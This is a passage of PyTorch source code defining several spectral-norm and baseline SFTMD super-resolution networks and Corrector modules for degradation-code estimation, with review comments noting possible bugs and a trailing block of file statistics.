            codes = codes.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, codes)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, codes)))
        out = self.conv_final(self.upscale(fea))
        if extra:
            return out, fea
        else:
            return out
class SFTMD_SN_Noise_JPEG(nn.Module):
    """Spectral-norm SFTMD conditioned on concatenated (kernel, noise, jpeg) codes.

    `norm` selects plain SN blocks (None) or SN+norm blocks; `bias_sn` also
    spectrally normalizes the bias vectors of the non-block convs.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
                 norm=None, bias_sn=False):
        super(SFTMD_SN_Noise_JPEG, self).__init__()
        self.n_RB = n_RB
        if bias_sn:
            print('Bias SN')
        self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
                                        n_power_iterations=n_power_iterations)
        if bias_sn:
            # Second wrap applies spectral norm to the bias parameter as well.
            self.conv_first = spectral_norm(self.conv_first, name='bias',
                                            n_power_iterations=n_power_iterations)
        for i in range(n_RB):
            if norm is None:
                # NOTE(review): bias_sn is not forwarded to the residual blocks
                # (hard-coded bias_sn=False) — confirm this is intentional.
                self.add_module('SFTRB' + str(i),
                                SFTResidualBlock_SN(nf=nf, n_condition=n_condition, bias_sn=False))
            else:
                self.add_module(
                    'SFTRB' + str(i),
                    SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
                                             n_power_iterations=n_power_iterations, norm=norm))
        if norm is None:
            self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition, bias_sn=False)
        else:
            self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
                                              n_power_iterations=n_power_iterations, norm=norm)
        self.conv_extra = spectral_norm(
            nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        if bias_sn:
            self.conv_extra = spectral_norm(self.conv_extra, name='bias',
                                            n_power_iterations=n_power_iterations)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages; with bias_sn the convs
            # are double-wrapped (weight SN + bias SN).
            if bias_sn:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                )
            else:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                )
        else:
            if bias_sn:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale),
                    nn.LeakyReLU(0.1, inplace=True),
                )
            else:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale),
                    nn.LeakyReLU(0.1, inplace=True),
                )
        self.conv_final = spectral_norm(
            nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        if bias_sn:
            self.conv_final = spectral_norm(self.conv_final, name='bias',
                                            n_power_iterations=n_power_iterations)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code, noise, jpeg, spatial=False, extra=False):
        """Super-resolve `input` conditioned on the joint (kernel, noise, jpeg) code.

        NOTE(review): `codes` is only assigned when spatial=False, so calling
        with spatial=True raises NameError — confirm intended usage.
        """
        _, _, H, W = input.size()
        if not spatial:
            codes = torch.cat((kernel_code, noise, jpeg), dim=1)
            Bk, Ck = codes.size()
            codes = codes.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, codes)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, codes)))
        out = self.conv_final(self.upscale(fea))
        if extra:
            return out, fea
        else:
            return out
class SFTMD_SN(nn.Module):
    """Spectral-norm SFTMD conditioned on a single kernel code.

    `norm` selects plain SN blocks (None) or SN+norm blocks; `bias_sn` also
    spectrally normalizes the bias vectors of the non-block convs.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
                 norm=None, bias_sn=False):
        super(SFTMD_SN, self).__init__()
        self.n_RB = n_RB
        if bias_sn:
            print('Bias SN')
        self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
                                        n_power_iterations=n_power_iterations)
        if bias_sn:
            # Second wrap applies spectral norm to the bias parameter as well.
            self.conv_first = spectral_norm(self.conv_first, name='bias',
                                            n_power_iterations=n_power_iterations)
        for i in range(n_RB):
            if norm is None:
                # NOTE(review): bias_sn is not forwarded to the residual blocks
                # (hard-coded bias_sn=False) — confirm this is intentional.
                self.add_module('SFTRB' + str(i), SFTResidualBlock_SN(nf=nf,
                                                                      n_condition=n_condition, bias_sn=False))
            else:
                self.add_module(
                    'SFTRB' + str(i),
                    SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
                                             n_power_iterations=n_power_iterations, norm=norm))
        if norm is None:
            self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition, bias_sn=False)
        else:
            self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
                                              n_power_iterations=n_power_iterations, norm=norm)
        self.conv_extra = spectral_norm(
            nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        if bias_sn:
            self.conv_extra = spectral_norm(self.conv_extra, name='bias',
                                            n_power_iterations=n_power_iterations)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages; with bias_sn the convs
            # are double-wrapped (weight SN + bias SN).
            if bias_sn:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                )
            else:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale // 2),
                    nn.LeakyReLU(0.1, inplace=True),
                )
        else:
            if bias_sn:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        spectral_norm(
                            nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1,
                                      bias=True), name='weight',
                            n_power_iterations=n_power_iterations), name='bias',
                        n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale),
                    nn.LeakyReLU(0.1, inplace=True),
                )
            else:
                self.upscale = nn.Sequential(
                    spectral_norm(
                        nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                        name='weight', n_power_iterations=n_power_iterations),
                    nn.PixelShuffle(scale),
                    nn.LeakyReLU(0.1, inplace=True),
                )
        self.conv_final = spectral_norm(
            nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        if bias_sn:
            self.conv_final = spectral_norm(self.conv_final, name='bias',
                                            n_power_iterations=n_power_iterations)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code, spatial=False, extra=False):
        """Super-resolve `input` conditioned on `kernel_code`.

        When `spatial` is False, the (B, C) code is broadcast to (B, C, H, W);
        otherwise it is used as-is. `extra` also returns the pre-upscale features.
        """
        _, _, H, W = input.size()
        if not spatial:
            Bk, Ck = kernel_code.size()
            kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
        out = self.conv_final(self.upscale(fea))
        if extra:
            return out, fea
        else:
            return out
class SFTMD_SN_Dropout(nn.Module):
    """Spectral-norm SFTMD with a widened conv pair and Dropout2d before upscaling.

    `dropSN` controls whether the two extra convs around the dropout are
    spectrally normalized as well.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
                 norm=None, dropSN=True):
        super(SFTMD_SN_Dropout, self).__init__()
        self.n_RB = n_RB
        self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
                                        n_power_iterations=n_power_iterations)
        for i in range(n_RB):
            if norm is None:
                self.add_module('SFTRB' + str(i), SFTResidualBlock_SN(nf=nf,
                                                                      n_condition=n_condition))
            else:
                self.add_module(
                    'SFTRB' + str(i),
                    SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
                                             n_power_iterations=n_power_iterations, norm=norm))
        if norm is None:
            self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition)
        else:
            self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
                                              n_power_iterations=n_power_iterations, norm=norm)
        if dropSN:
            # Widen to 2*nf before dropout, project back to nf after it.
            self.conv_extra = spectral_norm(
                nn.Conv2d(nf, nf * 2, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
                n_power_iterations=n_power_iterations)
            self.conv_extra2 = spectral_norm(
                nn.Conv2d(nf * 2, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
                n_power_iterations=n_power_iterations)
        else:
            self.conv_extra = nn.Conv2d(nf, nf * 2, kernel_size=3, stride=1, padding=1, bias=True)
            self.conv_extra2 = nn.Conv2d(nf * 2, nf, kernel_size=3, stride=1, padding=1, bias=True)
        self.dropout = nn.Dropout2d(p=0.5, inplace=False)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                spectral_norm(
                    nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                spectral_norm(
                    nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                spectral_norm(
                    nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = spectral_norm(
            nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code):
        """Super-resolve `input`; the (B, C) code is broadcast to (B, C, H, W)."""
        _, _, H, W = input.size()
        Bk, Ck = kernel_code.size()
        kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
        # Channel dropout between the widening and projection convs.
        fea = self.dropout(fea)
        fea = self.conv_extra2(fea)
        out = self.conv_final(self.upscale(fea))
        return out
class SFTMD_SN_ReLU(nn.Module):
    """Spectral-norm SFTMD using ReLU activations throughout (instead of LeakyReLU)."""

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
        super(SFTMD_SN_ReLU, self).__init__()
        self.n_RB = n_RB
        # Power iterations fixed to 1 in this variant.
        n_power_iterations = 1
        self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
                                        n_power_iterations=n_power_iterations)
        for i in range(n_RB):
            self.add_module('SFTRB' + str(i),
                            SFTResidualBlock_SN_ReLU(nf=nf, n_condition=n_condition))
        self.sft_extra = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
        self.conv_extra = spectral_norm(
            nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                spectral_norm(
                    nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale // 2),
                nn.ReLU(inplace=True),
                spectral_norm(
                    nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale // 2),
                nn.ReLU(inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                spectral_norm(
                    nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                    name='weight', n_power_iterations=n_power_iterations),
                nn.PixelShuffle(scale),
                nn.ReLU(inplace=True),
            )
        self.conv_final = spectral_norm(
            nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
            n_power_iterations=n_power_iterations)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, input, kernel_code):
        """Super-resolve `input`; the (B, C) code is broadcast to (B, C, H, W)."""
        _, _, H, W = input.size()
        Bk, Ck = kernel_code.size()
        kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.relu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.relu(self.sft_extra(fea, kernel_code)))
        out = self.conv_final(self.upscale(fea))
        return out
class SFTMD_concat(nn.Module):
    """Concatenation baseline: the kernel code is stacked onto the input image
    instead of modulating features via SFT; the trunk is plain residual blocks.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
        super(SFTMD_concat, self).__init__()
        self.n_RB = n_RB
        # Input is the image (3 ch) concatenated with the broadcast code map.
        self.conv_first = nn.Conv2d(n_condition + 3, nf, 3, stride=1, padding=1)
        for idx in range(n_RB):
            self.add_module('SFTRB' + str(idx), arch_util.ResidualBlock_noBN(nf=nf))
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # Two PixelShuffle(2) stages realise the x4 upscaling.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)

    def forward(self, input, kernel_code):
        """Super-resolve `input`; `kernel_code` is (B, C) and broadcast spatially."""
        _, _, height, width = input.size()
        code_b, code_c = kernel_code.size()
        code_map = kernel_code.view((code_b, code_c, 1, 1)).expand((code_b, code_c, height, width))
        trunk_in = self.lrelu(self.conv_first(torch.cat((input, code_map), 1)))
        trunk = trunk_in.clone()
        for idx in range(self.n_RB):
            trunk = getattr(self, 'SFTRB' + str(idx))(trunk)
        # Long skip connection around the residual trunk.
        merged = self.conv_extra(self.lrelu(trunk_in + trunk))
        return self.conv_final(self.upscale(merged))
class SFTMD_kernel(nn.Module):
    """SFTMD variant that predicts separable conv kernels from the code.

    A shared MLP maps the (flattened, 32-dim) code to the weights of two
    dynamic convs (a k x 1 then a 1 x k filter) applied to the input before a
    plain residual trunk.

    NOTE(review): the generated weights are reshaped with view((10, 3, k, 1)) /
    view((10, 10, 1, k)), which is only valid for batch size 1 and applies the
    same filters to the whole batch — confirm callers use B == 1.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, k=11):
        super(SFTMD_kernel, self).__init__()
        self.n_RB = n_RB
        # Shared trunk of the weight-generating MLP; expects a 32-dim code.
        self.fc_share_1 = nn.Linear(32, 100)
        self.fc_share_2 = nn.Linear(100, 200)
        self.fc_share_3 = nn.Linear(200, 400)
        self.fc_share_4 = nn.Linear(400, 200)
        # Heads producing the two separable dynamic-conv weight tensors.
        self.fc_share_conv1_1 = nn.Linear(200, 200)
        self.fc_share_conv1_2 = nn.Linear(200, 10 * 3 * k * 1)
        self.fc_share_conv2_1 = nn.Linear(200, 200)
        self.fc_share_conv2_2 = nn.Linear(200, 10 * 10 * k * 1)
        # Dynamic convs output 10 channels, hence 10 input channels here.
        self.conv_first = nn.Conv2d(10, nf, 3, stride=1, padding=1)
        for i in range(n_RB):
            self.add_module('SFTRB' + str(i), arch_util.ResidualBlock_noBN(nf=nf))
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        # 'same' padding for the k-tap separable filters.
        self.pad = (k - 1) // 2
        self.k = k

    def forward(self, input, kernel_code):
        """Apply code-generated separable convs, then the residual trunk and upscaler."""
        B, _, H, W = input.size()
        # generate conv code
        kernel_code = kernel_code.view((B, -1))
        kernel_code = self.lrelu(self.fc_share_1(kernel_code))
        kernel_code = self.lrelu(self.fc_share_2(kernel_code))
        kernel_code = self.lrelu(self.fc_share_3(kernel_code))
        kernel_code = self.lrelu(self.fc_share_4(kernel_code))
        conv1_weight = self.fc_share_conv1_2(self.lrelu(self.fc_share_conv1_1(kernel_code)))
        conv2_weight = self.fc_share_conv2_2(self.lrelu(self.fc_share_conv2_1(kernel_code)))
        # See class NOTE: these views assume B == 1.
        conv1_weight = conv1_weight.view((10, 3, self.k, 1))
        conv2_weight = conv2_weight.view((10, 10, 1, self.k))
        # Vertical then horizontal dynamic filtering (separable k x k).
        fea = self.lrelu(F.conv2d(input, conv1_weight, padding=(self.pad, 0)))
        fea = self.lrelu(F.conv2d(fea, conv2_weight, padding=(0, self.pad)))
        fea = self.lrelu(self.conv_first(fea))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(fea))
        out = self.conv_final(self.upscale(fea))
        return out
class SFTMD_coderefine(nn.Module):
    """SFTMD with a learned refinement MLP applied to the kernel code before it
    conditions the SFT residual trunk.
    """

    def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
        super(SFTMD_coderefine, self).__init__()
        self.n_RB = n_RB
        self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
        for i in range(n_RB):
            self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
        self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
        self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
        if scale == 4:
            # x4 upscaling as two PixelShuffle(2) stages.
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
                nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale // 2),
                nn.LeakyReLU(0.1, inplace=True),
            )
        else:
            self.upscale = nn.Sequential(
                nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
                nn.PixelShuffle(scale),
                nn.LeakyReLU(0.1, inplace=True),
            )
        self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
        self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
        # Code-refinement MLP: n_condition -> 400 -> 400 -> 200 -> n_condition.
        self.fc1 = nn.Linear(n_condition, 400)
        self.fc2 = nn.Linear(400, 400)
        self.fc3 = nn.Linear(400, 200)
        self.fc4 = nn.Linear(200, n_condition)

    def forward(self, input, kernel_code):
        """Refine the (B, C) code with the MLP, broadcast it, and super-resolve."""
        _, _, H, W = input.size()
        kernel_code = self.lrelu(self.fc1(kernel_code))
        kernel_code = self.lrelu(self.fc2(kernel_code))
        kernel_code = self.lrelu(self.fc3(kernel_code))
        kernel_code = self.fc4(kernel_code)
        Bk, Ck = kernel_code.size()
        kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
        fea = self.lrelu(self.conv_first(input))
        fea_sft = fea.clone()
        for i in range(self.n_RB):
            fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
        # Long skip connection around the residual trunk.
        fea = fea + fea_sft
        fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
        out = self.conv_final(self.upscale(fea))
        return out
class Corrector(nn.Module):
    """Predict a correction to a degradation code from the LR image.

    A conv feature extractor (optionally fused with the densely-embedded code
    via 1x1 convs) is pooled and mapped to a residual that is added to the raw
    input ``code``.
    """

    def __init__(self, inc=3, n_condition=10, nf=64, conv_merge=True, use_bias=True):
        super(Corrector, self).__init__()
        # Feature extractor: seven 5x5 convs, two with stride 2 (x4 downscale).
        body = []
        in_ch = inc
        for stride in (1, 2, 1, 2, 1, 1, 1):
            body.append(nn.Conv2d(in_ch, nf, kernel_size=5, stride=stride, padding=2,
                                  bias=use_bias))
            body.append(nn.LeakyReLU(0.1, True))
            in_ch = nf
        self.ConvNet = nn.Sequential(*body)
        # Dense embedding of the incoming code.
        self.code_dense = nn.Sequential(
            nn.Linear(n_condition, nf, bias=use_bias),
            nn.LeakyReLU(0.1, True),
            nn.Linear(nf, nf, bias=use_bias),
        )
        if conv_merge:
            # 1x1 convs fusing image features with the broadcast code embedding.
            self.global_dense = nn.Sequential(
                nn.Conv2d(nf * 2, nf * 2, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
                nn.Conv2d(nf * 2, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
                nn.Conv2d(nf, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
            )
        self.nf = nf
        self.conv_merge = conv_merge
        self.fc1 = nn.Linear(nf, nf, bias=True)
        self.fc2 = nn.Linear(nf, nf, bias=True)
        self.fc3 = nn.Linear(nf, n_condition, bias=True)
        self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))
        self.lrelu = nn.LeakyReLU(0.1, True)

    def forward(self, input, code):
        """Return the corrected code: raw ``code`` plus a predicted residual."""
        feat_map = self.ConvNet(input)
        batch, _, height, width = feat_map.size()  # LR_size
        code_emb = self.code_dense(code)
        if self.conv_merge:
            code_map = code_emb.view((batch, self.nf, 1, 1)).expand(
                (batch, self.nf, height, width))
            feat_map = self.global_dense(torch.cat((feat_map, code_map), dim=1))
        pooled = self.globalpooling(feat_map).view(feat_map.size(0), -1)
        pooled = self.lrelu(self.fc1(pooled))
        pooled = self.lrelu(self.fc2(pooled))
        return self.fc3(pooled) + code
class CorrectorV2(nn.Module):
    """Code estimator, V2: unlike Corrector, the predicted residual is added to
    the densely-embedded code (``code_dense(code)``) rather than the raw code.

    NOTE(review): the final addition requires the embedding width ``nf`` to
    match ``n_condition`` — confirm with callers.
    """

    def __init__(self, inc=3, n_condition=10, nf=64, conv_merge=False, use_bias=True):
        super(CorrectorV2, self).__init__()
        # Feature extractor: seven 5x5 convs, two with stride 2 (x4 downscale).
        layers = []
        prev = inc
        for s in (1, 2, 1, 2, 1, 1, 1):
            layers += [nn.Conv2d(prev, nf, kernel_size=5, stride=s, padding=2, bias=use_bias),
                       nn.LeakyReLU(0.1, True)]
            prev = nf
        self.ConvNet = nn.Sequential(*layers)
        # Dense embedding of the incoming code.
        self.code_dense = nn.Sequential(
            nn.Linear(n_condition, nf, bias=use_bias),
            nn.LeakyReLU(0.1, True),
            nn.Linear(nf, nf, bias=use_bias),
        )
        if conv_merge:
            # 1x1 convs fusing image features with the broadcast code embedding.
            self.global_dense = nn.Sequential(
                nn.Conv2d(nf * 2, nf * 2, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
                nn.Conv2d(nf * 2, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
                nn.Conv2d(nf, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
                nn.LeakyReLU(0.1, True),
            )
        self.nf = nf
        self.conv_merge = conv_merge
        self.fc1 = nn.Linear(nf, nf, bias=True)
        self.fc2 = nn.Linear(nf, nf, bias=True)
        self.fc3 = nn.Linear(nf, n_condition, bias=True)
        self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))
        self.lrelu = nn.LeakyReLU(0.1, True)

    def forward(self, input, code):
        """Return the refined code: predicted residual plus the dense code embedding."""
        features = self.ConvNet(input)
        n_batch, _, fh, fw = features.size()  # LR_size
        code_emb = self.code_dense(code)
        if self.conv_merge:
            spread = code_emb.view((n_batch, self.nf, 1, 1)).expand((n_batch, self.nf, fh, fw))
            features = self.global_dense(torch.cat((features, spread), dim=1))
        hidden = self.globalpooling(features).view(features.size(0), -1)
        hidden = self.lrelu(self.fc1(hidden))
        hidden = self.lrelu(self.fc2(hidden))
        # V2 behaviour: add to the embedded code, not the raw input code.
        return self.fc3(hidden) + code_emb
| 45.251845
| 110
| 0.572687
| 6,549
| 49,053
| 4.063674
| 0.028859
| 0.036073
| 0.096194
| 0.052418
| 0.942622
| 0.92793
| 0.917071
| 0.900876
| 0.893999
| 0.881975
| 0
| 0.034697
| 0.306097
| 49,053
| 1,083
| 111
| 45.293629
| 0.747165
| 0.009948
| 0
| 0.797553
| 0
| 0
| 0.011639
| 0
| 0
| 0
| 0
| 0.000923
| 0
| 1
| 0.044494
| false
| 0
| 0.006674
| 0
| 0.101224
| 0.002225
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
